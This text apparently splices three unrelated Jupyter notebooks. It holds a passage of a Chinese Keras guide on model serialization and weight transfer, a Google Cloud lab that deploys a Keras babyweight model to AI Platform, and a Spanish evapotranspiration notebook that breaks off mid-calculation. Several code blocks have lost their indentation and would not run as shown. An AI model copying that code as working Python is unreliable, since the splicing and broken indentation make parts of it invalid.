    def call(self, inputs, training=False):
        # Scale by the variable only in training mode; identity at inference.
        if training:
            return inputs * self.var
        else:
            return inputs
    def get_config(self):
        # Serializes the variable's CURRENT value (.numpy()), not the value
        # passed to the constructor.
        return {"a": self.var.numpy()}
    # There's actually no need to define `from_config` here, since returning
    # `cls(**config)` is the default behavior.
    @classmethod
    def from_config(cls, config):
        return cls(**config)

layer = CustomLayer(5)
layer.var.assign(2)  # mutate after construction; the config will say a=2
serialized_layer = keras.layers.serialize(layer)
new_layer = keras.layers.deserialize(
    serialized_layer, custom_objects={"CustomLayer": CustomLayer}
)
```
#### 注册自定义对象
Keras 会对生成了配置的类进行记录。在上例中,`tf.keras.layers.serialize` 生成了自定义层的序列化形式:
```
{'class_name': 'CustomLayer', 'config': {'a': 2}}
```
Keras 会保留所有内置的层、模型、优化器和指标的主列表,用于查找正确的类以调用 `from_config`。如果找不到该类,则会引发错误(`ValueError: Unknown layer`)。有几种方法可以将自定义类注册到此列表中:
1. 在加载函数中设置 `custom_objects` 参数。(请参阅上文“定义配置方法”部分中的示例)
2. `tf.keras.utils.custom_object_scope` 或 `tf.keras.utils.CustomObjectScope`
3. `tf.keras.utils.register_keras_serializable`
#### 自定义层和函数示例
```
class CustomLayer(keras.layers.Layer):
    """Dense-like layer (x·W + b) with a serializable `units` hyperparameter."""
    def __init__(self, units=32, **kwargs):
        super(CustomLayer, self).__init__(**kwargs)
        self.units = units
    def build(self, input_shape):
        # Weights are created lazily, once the input feature size is known.
        self.w = self.add_weight(
            shape=(input_shape[-1], self.units),
            initializer="random_normal",
            trainable=True,
        )
        self.b = self.add_weight(
            shape=(self.units,), initializer="random_normal", trainable=True
        )
    def call(self, inputs):
        return tf.matmul(inputs, self.w) + self.b
    def get_config(self):
        # Extend (never replace) the base config so name/dtype etc. survive.
        config = super(CustomLayer, self).get_config()
        config.update({"units": self.units})
        return config

def custom_activation(x):
    """Custom activation: tanh(x) squared."""
    return tf.nn.tanh(x) ** 2

# Make a model with the CustomLayer and custom_activation
inputs = keras.Input((32,))
x = CustomLayer(32)(inputs)
outputs = keras.layers.Activation(custom_activation)(x)
model = keras.Model(inputs, outputs)
# Retrieve the config
config = model.get_config()
# At loading time, register the custom objects with a `custom_object_scope`:
custom_objects = {"CustomLayer": CustomLayer, "custom_activation": custom_activation}
with keras.utils.custom_object_scope(custom_objects):
    new_model = keras.Model.from_config(config)
```
### 内存中模型克隆
您还可以通过 `tf.keras.models.clone_model()` 在内存中克隆模型。这相当于获取模型的配置,然后通过配置重建模型(因此它不会保留编译信息或层的权重值)。
**示例:**
```
# clone_model() == get_config() + from_config(): fresh weights, no compile info;
# the scope supplies the custom classes/functions referenced by the config.
with keras.utils.custom_object_scope(custom_objects):
    new_model = keras.models.clone_model(model)
```
## 仅保存和加载模型的权重值
您可以选择仅保存和加载模型的权重。这可能对以下情况有用:
- 您只需使用模型进行推断:在这种情况下,您无需重新开始训练,因此不需要编译信息或优化器状态。
- 您正在进行迁移学习:在这种情况下,您需要重用先前模型的状态来训练新模型,因此不需要先前模型的编译信息。
### 用于内存中权重迁移的 API
您可以使用 `get_weights` 和 `set_weights` 在不同对象之间复制权重:
- `tf.keras.layers.Layer.get_weights()`:返回 Numpy 数组列表。
- `tf.keras.layers.Layer.set_weights()`:将模型权重设置为 `weights` 参数中的值。
示例如下。
***在内存中将权重从一层转移到另一层***
```
def create_layer():
    """Return a built (i.e. weight-carrying) 64-unit ReLU Dense layer."""
    layer = keras.layers.Dense(64, activation="relu", name="dense_2")
    layer.build((None, 784))  # build eagerly so get/set_weights work right away
    return layer

layer_1 = create_layer()
layer_2 = create_layer()

# Copy weights from layer 1 to layer 2.  (The original comment stated the
# opposite direction; set_weights() writes INTO the object it is called on.)
layer_2.set_weights(layer_1.get_weights())
```
***在内存中将权重从一个模型转移到具有兼容架构的另一个模型***
```
# Create a simple functional model
inputs = keras.Input(shape=(784,), name="digits")
x = keras.layers.Dense(64, activation="relu", name="dense_1")(inputs)
x = keras.layers.Dense(64, activation="relu", name="dense_2")(x)
outputs = keras.layers.Dense(10, name="predictions")(x)
functional_model = keras.Model(inputs=inputs, outputs=outputs, name="3_layer_mlp")

# Define a subclassed model with the same architecture
class SubclassedModel(keras.Model):
    """Subclassed twin of `functional_model`: same layer sizes, same order,
    so get_weights()/set_weights() lists line up one-to-one."""
    def __init__(self, output_dim, name=None):
        super(SubclassedModel, self).__init__(name=name)
        self.output_dim = output_dim
        self.dense_1 = keras.layers.Dense(64, activation="relu", name="dense_1")
        self.dense_2 = keras.layers.Dense(64, activation="relu", name="dense_2")
        self.dense_3 = keras.layers.Dense(output_dim, name="predictions")
    def call(self, inputs):
        x = self.dense_1(inputs)
        x = self.dense_2(x)
        x = self.dense_3(x)
        return x
    def get_config(self):
        return {"output_dim": self.output_dim, "name": self.name}

subclassed_model = SubclassedModel(10)
# Call the subclassed model once to create the weights.
subclassed_model(tf.ones((1, 784)))
# Copy weights from functional_model to subclassed_model.
subclassed_model.set_weights(functional_model.get_weights())

# Verify the transfer: same number of weights, identical values.
assert len(functional_model.weights) == len(subclassed_model.weights)
for a, b in zip(functional_model.weights, subclassed_model.weights):
    np.testing.assert_allclose(a.numpy(), b.numpy())
```
***无状态层的情况***
因为无状态层不会改变权重的顺序或数量,所以即便存在额外的/缺失的无状态层,模型也可以具有兼容架构。
```
# Two architectures that differ only by a stateless Dropout layer still have
# identical weight lists, so weights transfer cleanly between them.
inputs = keras.Input(shape=(784,), name="digits")
x = keras.layers.Dense(64, activation="relu", name="dense_1")(inputs)
x = keras.layers.Dense(64, activation="relu", name="dense_2")(x)
outputs = keras.layers.Dense(10, name="predictions")(x)
functional_model = keras.Model(inputs=inputs, outputs=outputs, name="3_layer_mlp")

inputs = keras.Input(shape=(784,), name="digits")
x = keras.layers.Dense(64, activation="relu", name="dense_1")(inputs)
x = keras.layers.Dense(64, activation="relu", name="dense_2")(x)
# Add a dropout layer, which does not contain any weights.
x = keras.layers.Dropout(0.5)(x)
outputs = keras.layers.Dense(10, name="predictions")(x)
functional_model_with_dropout = keras.Model(
    inputs=inputs, outputs=outputs, name="3_layer_mlp"
)

functional_model_with_dropout.set_weights(functional_model.get_weights())
```
### 用于将权重保存到磁盘并将其加载回来的 API
可以用以下格式调用 `model.save_weights`,将权重保存到磁盘:
- TensorFlow 检查点
- HDF5
`model.save_weights` 的默认格式是 TensorFlow 检查点。可以通过以下两种方法来指定保存格式:
1. `save_format` 参数:将值设置为 `save_format="tf"` 或 `save_format="h5"`。
2. `path` 参数:如果路径以 `.h5` 或 `.hdf5` 结束,则使用 HDF5 格式。除非设置了 `save_format`,否则对于其他后缀,将使用 TensorFlow 检查点格式。
您还可以选择将权重作为内存中的 Numpy 数组取回。每个 API 都有自己的优缺点,详情如下。
### TF 检查点格式
**示例:**
```
# Runnable example: save weights in the (default) TF-checkpoint format and
# load them back into the same architecture.
sequential_model = keras.Sequential(
    [
        keras.Input(shape=(784,), name="digits"),
        keras.layers.Dense(64, activation="relu", name="dense_1"),
        keras.layers.Dense(64, activation="relu", name="dense_2"),
        keras.layers.Dense(10, name="predictions"),
    ]
)
sequential_model.save_weights("ckpt")
load_status = sequential_model.load_weights("ckpt")

# `assert_consumed` can be used as validation that all variable values have been
# restored from the checkpoint. See `tf.train.Checkpoint.restore` for other
# methods in the Status object.
load_status.assert_consumed()
```
#### 格式详情
TensorFlow 检查点格式使用对象特性名称来保存和恢复权重。以 `tf.keras.layers.Dense` 层为例。该层包含两个权重:`dense.kernel` 和 `dense.bias`。将层保存为 `tf` 格式后,生成的检查点会包含 `"kernel"` 和 `"bias"` 键及其对应的权重值。有关详细信息,请参阅 [TF 检查点指南中的“加载机制”](https://tensorflow.google.cn/guide/checkpoint#loading_mechanics)。
请注意,特性/计算图边缘根据**父对象中使用的名称而非变量的名称**进行命名。请考虑下面示例中的 `CustomLayer`。变量 `CustomLayer.var` 是将 `"var"` 而非 `"var_a"` 作为键的一部分来保存的。
```
class CustomLayer(keras.layers.Layer):
    # NOTE(review): `name="var_a"` is the variable's own name, but the
    # checkpoint key is derived from the ATTRIBUTE name "var" (this is the
    # point of the demo).  super().__init__() is omitted here; confirm the
    # targeted Keras version accepts that.
    def __init__(self, a):
        self.var = tf.Variable(a, name="var_a")

layer = CustomLayer(5)
layer_ckpt = tf.train.Checkpoint(layer=layer).save("custom_layer")
# Inspect the keys actually written to the checkpoint.
ckpt_reader = tf.train.load_checkpoint(layer_ckpt)
ckpt_reader.get_variable_to_dtype_map()
```
#### 迁移学习示例
本质上,只要两个模型具有相同的架构,它们就可以共享同一个检查点。
**示例:**
```
inputs = keras.Input(shape=(784,), name="digits")
x = keras.layers.Dense(64, activation="relu", name="dense_1")(inputs)
x = keras.layers.Dense(64, activation="relu", name="dense_2")(x)
outputs = keras.layers.Dense(10, name="predictions")(x)
functional_model = keras.Model(inputs=inputs, outputs=outputs, name="3_layer_mlp")
# Extract a portion of the functional model defined in the Setup section.
# The following lines produce a new model that excludes the final output
# layer of the functional model.
pretrained = keras.Model(
functional_model.inputs, functional_model.layers[-1].input, name="pretrained_model"
)
# Randomly assign "trained" weights.
for w in pretrained.weights:
w.assign(tf.random.normal(w.shape))
pretrained.save_weights("pretrained_ckpt")
pretrained.summary()
# Assume this is a separate program where only 'pretrained_ckpt' exists.
# Create a new functional model with a different output dimension.
inputs = keras.Input(shape=(784,), name="digits")
x = keras.layers.Dense(64, activation="relu", name="dense_1")(inputs)
x = keras.layers.Dense(64, activation="relu", name="dense_2")(x)
outputs = keras.layers.Dense(5, name="predictions")(x)
model = keras.Model(inputs=inputs, outputs=outputs, name="new_model")
# Load the weights from pretrained_ckpt into model.
model.load_weights("pretrained_ckpt")
# Check that all of the pretrained weights have been loaded.
for a, b in zip(pretrained.weights, model.weights):
np.testing.assert_allclose(a.numpy(), b.numpy())
print("\n", "-" * 50)
model.summary()
# Example 2: Sequential model
# Recreate the pretrained model, and load the saved weights.
inputs = keras.Input(shape=(784,), name="digits")
x = keras.layers.Dense(64, activation="relu", name="dense_1")(inputs)
x = keras.layers.Dense(64, activation="relu", name="dense_2")(x)
pretrained_model = keras.Model(inputs=inputs, outputs=x, name="pretrained")
# Sequential example:
model = keras.Sequential([pretrained_model, keras.layers.Dense(5, name="predictions")])
model.summary()
pretrained_model.load_weights("pretrained_ckpt")
# Warning! Calling `model.load_weights('pretrained_ckpt')` won't throw an error,
# but will *not* work as expected. If you inspect the weights, you'll see that
# none of the weights will have loaded. `pretrained_model.load_weights()` is the
# correct method to call.
```
通常建议使用相同的 API 来构建模型。如果您在序贯模型和函数式模型之间,或在函数式模型和子类化模型等之间进行切换,请始终重新构建预训练模型并将预训练权重加载到该模型。
下一个问题是,如果模型架构截然不同,如何保存权重并将其加载到不同模型?解决方案是使用 `tf.train.Checkpoint` 来保存和恢复确切的层/变量。
**示例:**
```
# Create a subclassed model that essentially uses functional_model's first
# and last layers.
# First, save the weights of functional_model's first and last dense layers.
first_dense = functional_model.layers[1]
last_dense = functional_model.layers[-1]
ckpt_path = tf.train.Checkpoint(
dense=first_dense, kernel=last_dense.kernel, bias=last_dense.bias
).save("ckpt")
# Define the subclassed model.
class ContrivedModel(keras.Model):
    """Subclassed model that reuses functional_model's first dense layer
    and re-creates its final layer's kernel/bias as raw weights, so the
    tf.train.Checkpoint saved above can be restored into it."""

    def __init__(self):
        super(ContrivedModel, self).__init__()
        self.first_dense = keras.layers.Dense(64)
        # Fix: `add_variable` is deprecated (and removed in recent TF);
        # `add_weight` is the supported API with identical semantics here.
        self.kernel = self.add_weight("kernel", shape=(64, 10))
        self.bias = self.add_weight("bias", shape=(10,))

    def call(self, inputs):
        # Dense layer followed by a manual affine head: x @ kernel + bias.
        x = self.first_dense(inputs)
        return tf.matmul(x, self.kernel) + self.bias
model = ContrivedModel()
# Call model on inputs to create the variables of the dense layer.
_ = model(tf.ones((1, 784)))
# Create a Checkpoint with the same structure as before, and load the weights.
tf.train.Checkpoint(
dense=model.first_dense, kernel=model.kernel, bias=model.bias
).restore(ckpt_path).assert_consumed()
```
### HDF5 格式
HDF5 格式包含按层名称分组的权重。权重是通过将可训练权重列表与不可训练权重列表连接起来进行排序的列表(与 `layer.weights` 相同)。因此,如果模型的层和可训练状态与保存在检查点中的相同,则可以使用 HDF5 检查点。
**示例:**
```
# Runnable example
sequential_model = keras.Sequential(
[
keras.Input(shape=(784,), name="digits"),
keras.layers.Dense(64, activation="relu", name="dense_1"),
keras.layers.Dense(64, activation="relu", name="dense_2"),
keras.layers.Dense(10, name="predictions"),
]
)
sequential_model.save_weights("weights.h5")
sequential_model.load_weights("weights.h5")
```
请注意,当模型包含嵌套层时,更改 `layer.trainable` 可能导致 `layer.weights` 的顺序不同。
```
class NestedDenseLayer(keras.layers.Layer):
    """Layer composed of two stacked Dense sublayers.

    Used to demonstrate that flipping ``trainable`` on a nested sublayer
    changes the ordering of ``layer.weights`` (and therefore breaks HDF5
    weight-file compatibility).
    """

    def __init__(self, units, name=None):
        super(NestedDenseLayer, self).__init__(name=name)
        self.dense_1 = keras.layers.Dense(units, name="dense_1")
        self.dense_2 = keras.layers.Dense(units, name="dense_2")

    def call(self, inputs):
        # Feed inputs through dense_1, then dense_2.
        hidden = self.dense_1(inputs)
        return self.dense_2(hidden)
nested_model = keras.Sequential([keras.Input((784,)), NestedDenseLayer(10, "nested")])
variable_names = [v.name for v in nested_model.weights]
print("variables: {}".format(variable_names))
print("\nChanging trainable status of one of the nested layers...")
nested_model.get_layer("nested").dense_1.trainable = False
variable_names_2 = [v.name for v in nested_model.weights]
print("\nvariables: {}".format(variable_names_2))
print("variable ordering changed:", variable_names != variable_names_2)
```
#### 迁移学习示例
从 HDF5 加载预训练权重时,建议将权重加载到设置了检查点的原始模型中,然后将所需的权重/层提取到新模型中。
**示例:**
```
def create_functional_model():
    """Build the 3-layer MLP (784 -> 64 -> 64 -> 10) used in the HDF5
    transfer-learning example and return it as a functional Model."""
    inputs = keras.Input(shape=(784,), name="digits")
    hidden = keras.layers.Dense(64, activation="relu", name="dense_1")(inputs)
    hidden = keras.layers.Dense(64, activation="relu", name="dense_2")(hidden)
    outputs = keras.layers.Dense(10, name="predictions")(hidden)
    return keras.Model(inputs=inputs, outputs=outputs, name="3_layer_mlp")
functional_model = create_functional_model()
functional_model.save_weights("pretrained_weights.h5")
# In a separate program:
pretrained_model = create_functional_model()
pretrained_model.load_weights("pretrained_weights.h5")
# Create a new model by extracting layers from the original model:
extracted_layers = pretrained_model.layers[:-1]
extracted_layers.append(keras.layers.Dense(5, name="dense_3"))
model = keras.Sequential(extracted_layers)
model.summary()
```
| github_jupyter |
# LAB 5b: Deploy and predict with Keras model on Cloud AI Platform.
**Learning Objectives**
1. Setup up the environment
1. Deploy trained Keras model to Cloud AI Platform
1. Online predict from model on Cloud AI Platform
1. Batch predict from model on Cloud AI Platform
## Introduction
In this notebook, we'll deploy our Keras model to Cloud AI Platform and create predictions.
We will set up the environment, deploy a trained Keras model to Cloud AI Platform, online predict from deployed model on Cloud AI Platform, and batch predict from deployed model on Cloud AI Platform.
Each learning objective will correspond to a __#TODO__ in this student lab notebook -- try to complete this notebook first and then review the [solution notebook](../solutions/5b_deploy_keras_ai_platform_babyweight.ipynb).
## Set up environment variables and load necessary libraries
Import necessary libraries.
```
import os
```
### Lab Task #1: Set environment variables.
Set environment variables so that we can use them throughout the entire lab. We will be using our project name for our bucket, so you only need to change your project and region.
```
%%bash
PROJECT=$(gcloud config list project --format "value(core.project)")
echo "Your current GCP Project Name is: "$PROJECT
# Change these to try this notebook out
PROJECT = "cloud-training-demos" # TODO: Replace with your PROJECT
BUCKET = PROJECT # defaults to PROJECT
REGION = "us-central1" # TODO: Replace with your REGION
os.environ["BUCKET"] = BUCKET
os.environ["REGION"] = REGION
os.environ["TFVERSION"] = "2.1"
%%bash
gcloud config set compute/region $REGION
gcloud config set ai_platform/region global
```
## Check our trained model files
Let's check the directory structure of our outputs of our trained model in folder we exported the model to in our last [lab](../solutions/5a_train_keras_ai_platform_babyweight.ipynb). We'll want to deploy the saved_model.pb within the timestamped directory as well as the variable values in the variables folder. Therefore, we need the path of the timestamped directory so that everything within it can be found by Cloud AI Platform's model deployment service.
```
!gsutil cp -r ../babyweight gs://<bucket-name> # TODO: Replace with your bucket-name
%%bash
gsutil ls gs://${BUCKET}/babyweight/trained_model
%%bash
MODEL_LOCATION=$(gsutil ls -ld -- gs://${BUCKET}/babyweight/trained_model/2* \
| tail -1)
gsutil ls ${MODEL_LOCATION}
```
## Lab Task #2: Deploy trained model.
Deploying the trained model to act as a REST web service is a simple gcloud call. Complete __#TODO__ by providing the location of the saved_model.pb file to the Cloud AI Platform model deployment service. The deployment will take a few minutes.
```
%%bash
MODEL_NAME="babyweight"
MODEL_VERSION="ml_on_gcp"
MODEL_LOCATION=# TODO: Add GCS path to saved_model.pb file.
echo "Deleting and deploying $MODEL_NAME $MODEL_VERSION from $MODEL_LOCATION"
# gcloud ai-platform versions delete ${MODEL_VERSION} --model ${MODEL_NAME}
# gcloud ai-platform models delete ${MODEL_NAME}
gcloud ai-platform models create ${MODEL_NAME} --regions ${REGION}
gcloud ai-platform versions create ${MODEL_VERSION} \
--model=${MODEL_NAME} \
--origin=${MODEL_LOCATION} \
--runtime-version=2.1 \
--python-version=3.7
```
## Lab Task #3: Use model to make online prediction.
Complete __#TODO__s for both the Python and gcloud Shell API methods of calling our deployed model on Cloud AI Platform for online prediction.
### Python API
We can use the Python API to send a JSON request to the endpoint of the service to make it predict a baby's weight. The order of the responses are the order of the instances.
```
from oauth2client.client import GoogleCredentials
import requests
import json
MODEL_NAME = # TODO: Add model name
MODEL_VERSION = # TODO: Add model version
token = GoogleCredentials.get_application_default().get_access_token().access_token
api = "https://ml.googleapis.com/v1/projects/{}/models/{}/versions/{}:predict" \
.format(PROJECT, MODEL_NAME, MODEL_VERSION)
headers = {"Authorization": "Bearer " + token }
data = {
"instances": [
{
"is_male": "True",
"mother_age": 26.0,
"plurality": "Single(1)",
"gestation_weeks": 39
},
{
"is_male": "False",
"mother_age": 29.0,
"plurality": "Single(1)",
"gestation_weeks": 38
},
{
"is_male": "True",
"mother_age": 26.0,
"plurality": "Triplets(3)",
"gestation_weeks": 39
},
# TODO: Create another instance
]
}
response = requests.post(api, json=data, headers=headers)
print(response.content)
```
The predictions for the four instances were: 5.33, 6.09, 2.50, and 5.86 pounds respectively when I ran it (your results might be different).
### gcloud shell API
Instead we could use the gcloud shell API. Create a newline delimited JSON file with one instance per line and submit using gcloud.
```
%%writefile inputs.json
{"is_male": "True", "mother_age": 26.0, "plurality": "Single(1)", "gestation_weeks": 39}
{"is_male": "False", "mother_age": 26.0, "plurality": "Single(1)", "gestation_weeks": 39}
```
Now call `gcloud ai-platform predict` using the JSON we just created and point to our deployed `model` and `version`.
```
%%bash
gcloud ai-platform predict \
--model=babyweight \
--json-instances=inputs.json \
--version=# TODO: Add model version
```
## Lab Task #4: Use model to make batch prediction.
Batch prediction is commonly used when you have thousands to millions of predictions. It will create an actual Cloud AI Platform job for prediction. Complete __#TODO__s so we can call our deployed model on Cloud AI Platform for batch prediction.
__NOTE:__ If you get any internal error after running the job, Please wait for a few minutes and re-run the below cell.
```
%%bash
INPUT=gs://${BUCKET}/babyweight/batchpred/inputs.json
OUTPUT=gs://${BUCKET}/babyweight/batchpred/outputs
gsutil cp inputs.json $INPUT
gsutil -m rm -rf $OUTPUT
gcloud ai-platform jobs submit prediction babypred_$(date -u +%y%m%d_%H%M%S) \
--data-format=TEXT \
--region ${REGION} \
--input-paths=$INPUT \
--output-path=$OUTPUT \
--model=babyweight \
--version=# TODO: Add model version
```
## Lab Summary:
In this lab, we set up the environment, deployed a trained Keras model to Cloud AI Platform, online predicted from deployed model on Cloud AI Platform, and batch predicted from deployed model on Cloud AI Platform.
Copyright 2022 Google Inc. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License
| github_jupyter |
```
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
#%matplotlib inline
# Leer la data
direccion = '.\\data\\data.xlsx'
# humedad relativa
df_humedad_relativa = pd.read_excel(direccion, sheet_name='Hoja1')
# Velocidad del viento
df_velocidad_del_viento = pd.read_excel(direccion, sheet_name='Hoja2')
# Temperatura maxima
df_temperatura_maxima = pd.read_excel(direccion, sheet_name='Hoja3')
# Temperatura minima
df_temperatura_minima = pd.read_excel(direccion, sheet_name='Hoja4')
#la tabla tiene los valores iniciales para interpolar y calcular valores
df_datos_iniciales = pd.read_excel(direccion, sheet_name='Hoja5')
# nombramos los caracteres que denoten un valor faltante
valor_faltante = '****'
#constantes
latitud = 18.4902777777778 #latitud
z=5 #altura de medicion sobre la superficie (m)
elevacion=2011 #Elevacionde la zona
# modificamos el nombre de las columnas para tener homogeneidad
nombre_columnas = ['AŃO', 'ENE', 'FEB', 'MAR', 'ABR',
'MAY', 'JUN', 'JUL', 'AGO', 'SEP', 'OCT', 'NOV', 'DIC', 'ANUAL']
df_humedad_relativa .columns = nombre_columnas
df_velocidad_del_viento.columns = nombre_columnas
df_temperatura_maxima.columns = nombre_columnas
df_temperatura_minima.columns = nombre_columnas
# visualizacion de datos iniciales sin corregir de la humedad relativa
df_humedad_relativa .head(5)
# visualizacion de datos iniciales sin corregir de la Valocidad del viento
df_velocidad_del_viento.head(5)
#visualizacion de datos de la temperatura maxima
df_temperatura_maxima.head(5)
#visualizacion de datos de la temperatura minima
df_temperatura_minima.head(5)
# El siguiente codigo corrige los datos, convirtiendolo en numericos decimales y remplazando los valores faltantes con la mediana
def correccionDeDatos(nombre_df, valor_faltante):
    """Clean a climate-data frame: coerce every column to float and fill
    missing values with that column's median.

    Parameters
    ----------
    nombre_df : pandas.DataFrame
        Raw sheet data; cells may contain the missing-value marker.
    valor_faltante : str
        Sentinel string that denotes a missing measurement (e.g. '****').

    Returns
    -------
    pandas.DataFrame
        New frame with numeric (float) columns and no missing values.
    """
    df = pd.DataFrame(nombre_df, columns=list(nombre_df))
    # Fix: iterate the frame's own columns instead of the module-level
    # global `nombre_columnas`, so the function works for any frame and
    # has no hidden coupling to the notebook's column list.
    for col in df.columns:
        # Replace the sentinel with NaN, then coerce to float.
        df[col] = df[col].replace(valor_faltante, np.nan)
        df[col] = pd.to_numeric(df[col], downcast='float')
        # Impute remaining NaNs with the column median (robust to outliers).
        mediana = df[col].median()
        df[col] = df[col].replace(np.nan, mediana)
    return df
df_humedad_relativa = correccionDeDatos(df_humedad_relativa, valor_faltante)
# numero de datos
cantidad_de_datos_humedad = df_humedad_relativa.shape[0]
# tabla corregida
df_humedad_relativa
df_velocidad_del_viento = correccionDeDatos(df_velocidad_del_viento, valor_faltante)
# numero de datos
cantidad_de_datos_vel_viento = df_velocidad_del_viento.shape[0]
# tabla corregida
df_velocidad_del_viento
#Conversion de km/hr a m/s
valores_anuales_de_vel = df_velocidad_del_viento['AŃO']
df_velocidad_del_viento_ms = df_velocidad_del_viento*1000/3600
df_velocidad_del_viento_ms['AŃO']=df_velocidad_del_viento['AŃO']
df_velocidad_del_viento_ms
df_temperatura_maxima = correccionDeDatos(df_temperatura_maxima, valor_faltante)
# numero de datos
cantidad_de_datos_temperatura_max = df_temperatura_maxima.shape[0]
# tabla corregida
df_temperatura_maxima
df_temperatura_minima = correccionDeDatos(df_temperatura_minima, valor_faltante)
# numero de datos
cantidad_de_datos_temperatura_min = df_temperatura_minima.shape[0]
# tabla corregida
df_temperatura_minima
df_temperatura_media=(df_temperatura_maxima+df_temperatura_minima)/2
# tabla corregida
df_temperatura_media
nombre_columnas_evot = ['MES', 'LATITUD SUPERIOR', 'LATITUD INFERIOR', 'RADIACION EXTRATERRESTRE SUP', 'RADIACION EXTRATERRESTRE INF', 'INSOLACION MAXIMA DIARIA SUP',
'INSOLACION MAXIMA DIARIA INF', 'PORCENTAJE BANDA DE COBRTURA DE NUBES']
df_datos_iniciales.columns = nombre_columnas_evot
#la tabla contara con los siguientes datos
#radiacion extraterrestre (Ra)
#insolacion maxima diaria (Na)
#porcentaje
df_datos_iniciales
df_datos_iniciales
#el siguiente codigo se encarga de interpolar valores
def interpolacionColumnas(x0, x1, y0, y1, x):
    """Linear interpolation: value at `x` on the line through
    (x0, y0) and (x1, y1), rounded to 3 decimal places.

    Works element-wise when the endpoints are pandas Series.
    """
    fraccion = (x - x0) * (y1 - y0) / (x1 - x0)
    return round(y0 + fraccion, 3)
#valores para la interpolacion
x0=df_datos_iniciales['LATITUD INFERIOR']
x1=df_datos_iniciales['LATITUD SUPERIOR']
y0_R=df_datos_iniciales['RADIACION EXTRATERRESTRE INF']
y1_R=df_datos_iniciales['RADIACION EXTRATERRESTRE SUP']
y0_I=df_datos_iniciales['INSOLACION MAXIMA DIARIA INF']
y1_I=df_datos_iniciales['INSOLACION MAXIMA DIARIA SUP']
x=latitud
#a acontinuacion se calcula los valores de radiacion e insolacion maxima para nuestro caso
col_radiacion=interpolacionColumnas(x0,x1,y0_R,y1_R,x)
col_insolacion=interpolacionColumnas(x0,x1,y0_I,y1_I,x)
#A continuacion calculamos duracion de la insolacion para la ubicacion en especifica
col_dur_insolacion = col_insolacion*df_datos_iniciales['PORCENTAJE BANDA DE COBRTURA DE NUBES']/100
#creamos una nueva tabla
meses=df_datos_iniciales['MES']
#nombre columnas
nombre_tabla_final = ['MES','RADIACION EXTRATERRESTRE (RA)','INSOLACION MAXIMA DIARIA (N hrs)','DURACION DE LA INSOLACION (hrs)']
valores= list(zip(meses,col_radiacion,col_insolacion,col_dur_insolacion))
df_datos=pd.DataFrame(valores,columns=nombre_tabla_final)
#anadimos el ascendente
df_datos
# calculamos la velocidad promedio del viento
velocidad_Del_viento_promedio = list(df_velocidad_del_viento_ms.mean())
velocidad_Del_viento_promedio.pop(13)
velocidad_Del_viento_promedio.pop(0)
# calculamos la velocidad promedio del viento
humedad_relativa_promedio = list(df_humedad_relativa.mean())
humedad_relativa_promedio.pop(13)
humedad_relativa_promedio.pop(0)
# temperatura maxima promedio
temperatura_maxima = list(df_temperatura_maxima.mean())
temperatura_maxima.pop(13)
temperatura_maxima.pop(0)
# temperatura minima promedio
temperatura_minima = list(df_temperatura_minima.mean())
temperatura_minima.pop(13)
temperatura_minima.pop(0)
# calculamos la TEMPERATURA PROMEDIO
temperatura_promedio = list(df_temperatura_media.mean())
temperatura_promedio.pop(13)
temperatura_promedio.pop(0)
# creamos una nueva tabla
# nombre columnas
nombre_tabla_calculos = ['MES', 'HUMEDAD RELATIVA',
'VELOCIDAD DEL VIENTO (m/s)', 'TEMPERATURA MAXIMA (C)', 'TEMEPERATURA MINIMA (C)', 'TEMPERATURA MEDIA (C)']
valores = list(zip(meses, humedad_relativa_promedio, velocidad_Del_viento_promedio,
temperatura_maxima, temperatura_minima, temperatura_promedio))
df_calculos = pd.DataFrame(valores, columns=nombre_tabla_calculos)
#Calculos
#Calculo de la velocidad u2 (m/s)
df_calculos['u2 (m/s)']=df_calculos['VELOCIDAD DEL VIENTO (m/s)']*4.87/(np.log(67.8*z-5.42))
#CALCULO DE LA PRESION
p=round(101.3*((293-0.0065*elevacion)/293)**5.26,3)
#constante psicometrica kpa/c
const_ps=round(0.665*p*0.001,5)
df_calculos['PRESION']=p
df_calculos['CONSTANTE PSICOMETRICA (Kpa/C)']=const_ps
df_calculos['TEMPERATURA MEDIA (C)']=temperatura_promedio
df_calculos['PENDIENTE DE LA CURVA DE PRESION DE VAPOR (KPA/C)']=4098*0.6108*np.exp((17.27*df_calculos['TEMPERATURA MEDIA (C)'])/(df_calculos['TEMPERATURA MEDIA (C)']+237.3))/(df_calculos['TEMPERATURA MEDIA (C)']+237.3)**2
#calculo del flujo del calor del suelo
gs_1=round(0.14*(df_calculos['TEMPERATURA MEDIA (C)'][0]-df_calculos['TEMPERATURA MEDIA (C)'][11]),5)
gs=[]
gs.append(gs_1)
for i in range(1,len(df_calculos['TEMPERATURA MEDIA (C)'])):
ti=df_calculos['TEMPERATURA MEDIA (C)'][i]
ti_1=df_calculos['TEMPERATURA MEDIA (C)'][i-1]
gs_cal=round(0.14*(ti-ti_1),5)
gs.append(gs_cal)
df_calculos['FLUJO DEL CALOR DEL SUELO (mj/m2/dia)']=gs
#DEFICIT DE PRESION DE VAPOR
df_calculos['DEFICIT DE PRESION DE VAPOR etmax (KPA)']=0.6108*np.exp((17.27*df_calculos['TEMPERATURA MAXIMA (C)'])/(df_calculos['TEMPERATURA MAXIMA (C)']+237.3))
df_calculos['DEFICIT DE PRESION DE VAPOR etmin (KPA)']=0.6108*np.exp((17.27*df_calculos['TEMEPERATURA MINIMA (C)'])/(df_calculos['TEMEPERATURA MINIMA (C)']+237.3))
df_calculos['PRESION VAPOR DE SATURACION (KPA)']=(df_calculos['DEFICIT DE PRESION DE VAPOR etmax (KPA)']+df_calculos['DEFICIT DE PRESION DE VAPOR etmin (KPA)'])/2
df_calculos['PRESION REAL DE VAPOR (KPA)']=df_calculos['HUMEDAD RELATIVA']*df_calculos['PRESION VAPOR DE SATURACION (KPA)']/100
#RADIACION NETA EN LA SUPERFICIE
#creamos una nueva tabla
df_RN=df_datos
#calculos
df_RN['Rs']=round((0.25+0.5*df_RN['DURACION DE LA INSOLACION (hrs)']/df_RN['INSOLACION MAXIMA DIARIA (N hrs)'])*df_RN['RADIACION EXTRATERRESTRE (RA)'],5)
df_RN['Rns']=round(0.77*df_RN['Rs'],5)
#radiacion de onda larga
